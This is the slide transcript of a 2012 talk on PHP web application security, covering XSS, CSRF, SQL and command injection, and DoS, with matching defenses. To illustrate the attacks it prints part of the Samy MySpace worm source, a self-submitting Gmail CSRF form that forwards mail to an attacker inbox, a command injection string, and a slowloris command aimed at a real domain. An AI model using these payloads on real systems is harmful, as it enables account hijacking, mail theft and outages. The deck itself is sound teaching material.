Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Stop Exposing Yourself: Exploits, Attacks and Defenses

F670cde47cb2f445575ac4e0e3c7a889?s=47 Geoffrey Tran
July 03, 2012
Programming
2
370

Stop Exposing Yourself: Exploits, Attacks and Defenses

A talk about security issues and exploits in the web with a focus on PHP. We will cover common exploits and how to defense yourself from them.

F670cde47cb2f445575ac4e0e3c7a889?s=128

Geoffrey Tran

July 03, 2012
Tweet

More Decks by Geoffrey Tran

See All by Geoffrey Tran
An Introduction to Symfony2
F670cde47cb2f445575ac4e0e3c7a889?s=48 geoff
1
200

Other Decks in Programming

See All in Programming
Let's make a contract: the art of designing a Java API
9eafc29df96e6aaf4a3eb4c0209086ae?s=48 mariofusco
0
160
Reinventing the wheel ... as a service
9eafc29df96e6aaf4a3eb4c0209086ae?s=48 mariofusco
3
220
mrubyを1300円のボードで動かそう
9ec05c5a1b9b0ce9cd53ec3a63838b9a?s=48 yuuu
0
180
ebpfとWASMに思いを馳せる2022 / techfeed-conference-2022-ebpf-wasm-amsy810
De266761b955b2636e454a1bc7a99ed4?s=48 masayaaoyama
0
470
読みやすいコードを書こう
A7048be18b1c2e712e5b564b1adb1f7e?s=48 yutorin
0
370
CIでAndroidUIテストの様子を録画してみた
46b3bc302e3a40f8df60cfb60d59c313?s=48 mkeeda
0
140
Micro Frontends with Module Federation: Beyond the Basics
15934fa2aa7b2ce21f091e9b7cffa856?s=48 manfredsteyer
PRO
0
300
もしも、 上司に鬼退治を命じられたら~プロジェクト計画編~
Fb0a40e5e7a9dc85520f1646fd41eb44?s=48 higuuu
0
270
クリエイティブ系のウェブサイト制作で役立つCSS技法 / CSS for develop creative website
4b7124f2f5989173c8ce3b0934817a32?s=48 clockmaker
2
1.3k
Git Rebase
E0e036f89c14b3e59640318eedf9670b?s=48 bkuhlmann
7
1k
JGS594 Lecture 23
B546a9b97d993392e4b22b74b99b91fe?s=48 javiergs
PRO
0
400
Untangling Coroutine Testing (Android Makers 2022)
4047c64e3a1e2f81addd4ba675ddc451?s=48 zsmb
0
400

Featured

See All Featured
How STYLIGHT went responsive
F716e5f737fcfb03f2cf8d1a184f1dbe?s=48 nonsquared
85
3.9k
Building Better People: How to give real-time feedback that sticks.
9952dfcd5d338f8a8e7175c8a8f65fb5?s=48 wjessup
343
17k
The Cult of Friendly URLs
Ded01cdab114abe4ec13511e4c25b9bb?s=48 andyhume
68
4.7k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
B3d6434763caa0ef5dc4b792662c49f7?s=48 smashingmag
237
19k
The World Runs on Bad Software
20bfe76b3d6105641f879fe45cfc9272?s=48 bkeepers
PRO
56
5.2k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
Fd55de4174accaf3b4f030e43a8a70c6?s=48 marcduiker
3
430
Web development in the modern age
465724d73fe3a92c0879fdfb43a3a6f3?s=48 philhawksworth
197
9.3k
Art, The Web, and Tiny UX
D67fff74178013024d833b3eec6cf27f?s=48 lynnandtonic
280
17k
JavaScript: Past, Present, and Future - NDC Porto 2020
3ab1249be442027903e1180025340b3f?s=48 reverentgeek
37
3.2k
How To Stay Up To Date on Web Technology
8081b26e05bb4354f7d65ffc34cbbd67?s=48 chriscoyier
780
250k
Keith and Marios Guide to Fast Websites
E14f55d3f939977cecbf51b64ff6f861?s=48 keithpitt
404
21k
What's new in Ruby 2.0
7edec06b5435e0dac07a353b2cc26253?s=48 geeforr
336
30k

Transcript

  1. Stop Exposing Yourself Exploits, Attacks and Defenses Geoffrey Tran Creative

    Technology, RAPP

  2. About Me •  Creative Technologist at RAPP •  Fun with

    PHP since 2005 •  Contributor to Zend Framework and Symfony2 Download Examples: http://rapp.io/1y 2

  3. Why even bother? “Information leakage is one of the biggest

    issues that organizations are facing” Download Examples: http://rapp.io/1y 3

  4. Why even bother? “93% of organizations have been hacked at

    least once in the past two years through insecure Web applications” State of Web Application Security, Ponemon Institute Download Examples: http://rapp.io/1y 4

  5. Why even bother? “74% of respondents believe Web applications security

    is either more critical or equally critical to other security issues faced by their organizations” Download Examples: http://rapp.io/1y State of Web Application Security, Ponemon Institute 5

  6. Why even bother? “12% strongly agree that they have ample

    resources to detect and remediate insecure Web apps” State of Web Application Security, Ponemon Institute Download Examples: http://rapp.io/1y 6

  7. Why even bother? “64% do not agree that their organization

    is able to fix Web application vulnerabilities quickly” State of Web Application Security, Ponemon Institute Download Examples: http://rapp.io/1y 7

  8. Why even bother? “88% of respondents say their Web application

    security budget is less than the organization’s coffee budget” State of Web Application Security, Ponemon Institute Download Examples: http://bit.ly/NcGSod 8

  9. OWASP Top 10 Application Security Risks - 2010 1.  Injection

    Attacks 2.  Cross Site Scripting (XSS) 3.  Authentication and Session Management 4.  Unauthorized access/Privilege escalation 5.  Cross Site Request Forgery (CSRF) 6.  Misconfiguration 7.  Insecure Storage 8.  Failure to restrict URL access 9.  Insufficient transport layer protection 10. Un-validated redirects and forwards https://www.owasp.org/index.php/Top_10_2010-Main 9

  10. Overview •  Cross-site scripting (XSS) •  Cross-site request forgery (CSRF)

    •  SQL Injection •  Command Injection •  Remote Code Execution •  Denial of Service •  Unnecessary Information Disclosure 10

  11. Cross-site scripting (XSS) •  Occurs when – Data enters an application

    through an untrusted source, most frequently a web request – The data is included in dynamic content that is sent to a web user without being validated for malicious code https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) 11

  12. Cross-site scripting (XSS) •  Types of XSS Attacks – Stored XSS

    Attacks (Persistent) •  When injected code is stored and unknowingly retrieved by victims – Reflected XSS Attacks (Non-Persistent) •  When injected code is reflected off the application via an un-escaped field https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) 12

  13. Cross-site scripting (XSS) •  What can an attacker do with

    an XSS vulnerability? – Launch a phishing attack – Steal session and cookie data to log in as the victim – Perform unwanted actions as the victim https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) 13

  14. CROSS-SITE SCRIPTING (XSS) Reflected XSS Example Example: lonestar12/XSS/reflected.php 14

  15. Cross-site scripting (XSS) •  Imagine you have a search results

    page •  You display the query a user inputs in the search field – “You searched for: dogs” Example: lonestar12/XSS/reflected.php <form method="get"> <input type="text" name="q" /> <input type="submit" value="Search" /> </form> <h2>You searched for: "<?php echo $_GET['q'] ?>"</h2> 15

  16. Cross-site scripting (XSS) •  But what happens if a user

    enters the following as a query? Example: lonestar12/XSS/reflected.php <script>alert('Hi')</script> <form method="get"> <input type="text" name="q" /> <input type="submit" value="Search" /> </form> <h2>You searched for: "<?php echo $_GET['q'] ?>"</h2> 16

  17. Cross-site scripting (XSS) Example: lonestar12/XSS/reflected.php <script>alert('Hi')</script> 17

  18. Cross-site scripting (XSS) We end up with the following output:

    Example: lonestar12/XSS/reflected.php <form method="get"> <input type="text" name="q" /> <input type="submit" value="Search" /> </form> <h2>Showing results for: "<script>alert('hi')</script>"</h2> <form method="get"> <input type="text" name="q" /> <input type="submit" value="Search" /> </form> <h2>You searched for: "<?php echo $_GET['q'] ?>"</h2> 18

  19. Cross-site scripting (XSS) Example: lonestar12/XSS/reflected.php 19

  20. CROSS-SITE SCRIPTING (XSS) MySpace “Samy is my hero” Example http://namb.la/popular/

    http://www.slideshare.net/simon/when-ajax-attacks-web-application-security-fundamentals-presentation 20

  21. Cross-site scripting (XSS) <div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var

    A=String.fromCharCode (39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else {return eval('document.body.inne'+'rHTML')}}function getData(AU) {M=getFromURL(AU,'friendID');L=getFromURL (AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split ('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com') {document.location='http://www.myspace.com'+location.pathname+location.search}else{if(! M){getData(g())}main()} function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)} function nothing(){}function paramsToString(AV) {var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1) {Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O+ +}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false} eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST') {J.setRequestHeader('Content-Type','application/x-www-form- urlencoded');J.setRequestHeader('Content- Length',BK.length)}J.send(BK);return true} function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R +1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn (BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG +'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring (0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e) {Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')} catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace ('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState! =4){return}var AU=J.responseText;AG=findIn (AU,'P'+'rofileHeroes','</ 21

  22. Cross-site scripting (XSS) October 4th, 2005 12:34 pm: You have

    73 friends. I decided to release my little popularity program. I'm going to be famous...among my friends. 1:30 am: You have 73 friends and 1 friend request. One of my friends' girlfriend looks at my profile. She's obviously checking me out. I approve her inadvertent friend request and go to bed grinning. 8:35 am: You have 74 friends and 221 friend requests. Woah. I did not expect this much. I'm surprised it even worked.. 200 people have been infected in 8 hours. That means I'll have 600 new friends added every day. Woah. 9:30 am: You have 74 friends and 480 friend requests. Oh wait, it's exponential, isn't it. Shit. 22

  23. Cross-site scripting (XSS) In 20 hours, “Samy is my hero”

    spread to 1,005,831 people ...1/35th of all MySpace users 23

  24. Cross-site scripting (XSS) 24

  25. Preventing Cross-site scripting (XSS) •  $_GET •  $_POST •  $_COOKIE

    •  $_REQUEST •  $_FILES •  $_ENV •  $_SERVER 25 https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) These all can be manipulated by the user Don’t trust anyone …Not even little girls

  26. Preventing Cross-site scripting (XSS) •  Always user validate input – filter_var

    •  Escape or filter all outputs – htmlspecialchars() – htmlentities() – strip_tags() •  Beware with tag allowances as attributes are not validated 26

  27. Cross-site Request Forgery (CSRF) •  Occurs when victims load a

    page that contains a malicious request •  Malicious because the request inherits the identity and privileges of the victim forcing an undesired action on the victim’s behalf. – Posting a tweet – Purchasing a product http://en.wikipedia.org/wiki/Cross-site_request_forgery 27

  28. CROSS-SITE REQUEST FORGERY (CSRF) CSRF Example Example: lonestar12/CSRF/img.html 28

  29. Cross-site Request Forgery (CSRF) •  An attacker creates a seemingly

    harmless looking webpage •  A visitor lands on the page while logged in to their bank's website, which has a CSRF vulnerability •  The malicious page creates a request on behalf of the visitor to transfer funds without permission <img src="http://bank.com/transferFunds?amount=5000&to=Geoff's Bank Account" width="0" height="0" /> Example: lonestar12/CSRF/img.html 29

  30. CROSS-SITE REQUEST FORGERY (CSRF) Google Gmail Email Snooping (2007) http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

    30

  31. Cross-site Request Forgery (CSRF) 31

  32. Cross-site Request Forgery (CSRF) 32

  33. Cross-site Request Forgery (CSRF) <form method="POST" action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf" enctype="multipart/form-data"> <input type="hidden"

    name="cf2_emc" value="true"/> <input type="hidden" name="cf2_email" value="evilinbox@mailinator.com"/> <input type="hidden" name="cf1_from" value=""/> <input type="hidden" name="cf1_to" value=""/> <input type="hidden" name="cf1_subj" value=""/> <input type="hidden" name="cf1_has" value=""/> <input type="hidden" name="cf1_hasnot" value=""/> <input type="hidden" name="cf1_attach" value="true"/> <input type="hidden" name="tfi" value=""/> <input type="hidden" name="s" value="z"/> <input type="hidden" name="irf" value="on"/> <input type="hidden" name="nvp_bu_cftb" value="Create Filter"/> </form> <script> document.forms[0].submit(); </script> 33

  34. Cross-site Request Forgery (CSRF) 34

  35. Preventing CSRF •  Require POST for actions that modify data

    •  Require a token or “crumb” for all sensitive forms 35

  36. Preventing CSRF 36 <?php if (!isset($_SESSION['csrfToken'])) { $_SESSION['csrfToken'] = md5(uniqid("",

    true)); } if ($_SERVER['REQUEST_METHOD'] == 'POST') { if ($_POST['csrf_token'] == $_SESSION['csrfToken']) { // SUCCESS } else { // FAILURE header('HTTP/1.0 403 Forbidden'); exit; } } ?> <form method="POST" enctype="multipart/form-data"> <input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrfToken'] ?>" /> <input type="text" name="amount" value=""/> <input type="text" name="to" value=""/> <input type="submit" value="Transfer Funds" /> </form>

  37. Preventing CSRF (crossdomain.xml) •  Do not use the following as

    your crossdomain.xml •  Putting this at example.com/crossdomain.xml allows Flash applets on other sites make requests to your site on behalf of the user 37 <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy>

  38. SQL Injection •  Occurs when attackers inject un- escaped SQL

    commands into a predefined SQL query http://xkcd.com/327/ 38

  39. SQL INJECTION SQL Injection Example Example: lonestar12/SQL Injection/img.html 39

  40. SQL Injection •  Beware of un-escaped user input •  Use

    prepared statements or proper quoting instead 40 $pdo->exec('INSERT INTO `comments` (`body`) VALUES ("' . $_POST['body'] . '")'); $stmt = $pdo->prepare('INSERT INTO `comments` (`body`) VALUES (:body)'); $stmt->bindParam(':body', $_POST['body']); $stmt->execute();

  41. SQL INJECTION MySQL.com Website Falls Victim to SQL Injection Attack

    http://www.pcworld.com/businesscenter/article/223457/mysql_website_falls_victim_to_sql_injection_attack.html 41 http://pastebin.com/BayvYdcP

  42. Command Injection •  Occurs when an attacker is able to

    inject system commands •  Command injection attacks are possible in most cases because of lack of correct input data validation 42

  43. COMMAND INJECTION Command Injection Example Example: lonestar12/Command Injection/example.php 43

  44. Command Injection 44 •  A simple nslookup page <?php $host

    = 'google'; if (isset($_GET['host'])) { $host = $_GET['host']; } system("nslookup " . $host); ?> <form method="get"> <select name="host"> <option value="google.com">google</option> <option value="yahoo.com">yahoo</option> </select> <input type="submit"> </form>

  45. Command Injection 45 •  What if $_GET[‘host’] contained – google.com &&

    ls / Example: lonestar12/Command Injection/example.php <?php $host = 'google'; if (isset($_GET['host'])) { $host = $_GET['host']; } system("nslookup " . $host); ?> <form method="get"> <select name="host"> <option value="google.com">google</option> <option value="yahoo.com">yahoo</option> </select> <input type="submit">

  46. Command Injection 46 Example: lonestar12/Command Injection/example.php example.php?host=google.com %26%26 ls -a

    /

  47. Preventing Command Injection 47 •  Escape shell commands – escapeshellarg() – escapeshellcmd()

    <?php // We allow arbitrary number of arguments intentionally here. $command = './configure '.$_POST['configure_options']; $command = escapeshellcmd($command); system($command); <?php system('ls '.escapeshellarg($dir));

  48. Denial of Service (DoS) •  A DoS attack focuses on

    making a service unavailable or degraded to users 52

  49. Methods of DoS Attacks •  ICMP flood •  SYN flood

    •  Teardrop attacks •  Low-rate attacks •  Peer-to-peer attacks •  Asymmetry of resource utilization in starvation •  Permanent DoS attacks •  Application-level floods •  Nuke •  R-U-Dead-Yet? •  Distributed attacks •  Reflected / Spoofed attacks •  Degradation-of- service attacks •  Unintentional DoS 53

  50. DENIAL OF SERVICE (DOS) Slowloris Denial of Service Example Example:

    lonestar12/Denial of Service/slowloris.php 54

  51. Slowloris Denial of Service (DoS) •  Slowloris Attack –  Tries

    to keep many connections to the target web server open and hold them open as long as possible. –  It accomplishes this by opening connections to the target web server and sending a partial request. –  Periodically, it will send subsequent HTTP headers, adding to—but never completing—the request. –  Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients 55 Example: lonestar12/Denial of Service/slowloris.php

  52. Denial of Service (DoS) •  Slowloris affects the following webservers

    –  Apache 1.x, Apache 2.x, dhttpd, and the GoAhead WebServer 56 Example: lonestar12/Denial of Service/slowloris.php # php slowloris.php get 100000 jakefolio.com

  53. Preventing Denial of Service (DoS) Attacks •  Apache – mod_security, mod_evasive,

    mod_qos, mod_antiloris •  Look into proper firewalls and intrusion detection systems 57 Example: lonestar12/Denial of Service/slowloris.php

  54. Unnecessary Information Disclosure – Reduce your attack surface •  PHP displaying

    errors/exceptions •  Exposing php information •  Exposing Apache information •  Exposing Server information 59

  55. Unnecessary Information Disclosure Reduce your attackable surfaces 60 Hide displaying

    of errors and exceptions ; php.ini display_errors = Off OR ini_set(‘display_errors’, false);

  56. Unnecessary Information Disclosure Reduce your attackable surfaces 61 Hide exposure

    of PHP ; php.ini expose_php = Off HTTP/1.1 200 OK Date: Fri, 29 Jun 2012 17:02:54 GMT Server: Apache/2.2.16 (Ubuntu) X-Powered-By: PHP/5.3.3-1ubuntu9.6 Vary: Accept-Encoding Content-Type: text/html

  57. Unnecessary Information Disclosure Reduce your attackable surfaces 62 Hide exposure

    of Apache # Debian # /etc/apache2/apache2.conf ServerTokens prod HTTP/1.1 200 OK Date: Fri, 29 Jun 2012 17:02:54 GMT Server: Apache/2.2.16 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html

  58. Unnecessary Information Disclosure Reduce your attackable surfaces 63 Don’t expose

    your database, search server, memcache, mail server, etc... Configure your firewall

  59. Stop Exposing Yourself Exploits, Attacks and Defenses 64 @geoffreytran http://www.linkedin.com/in/geoffreytran

    geoffrey.tran@gmail.com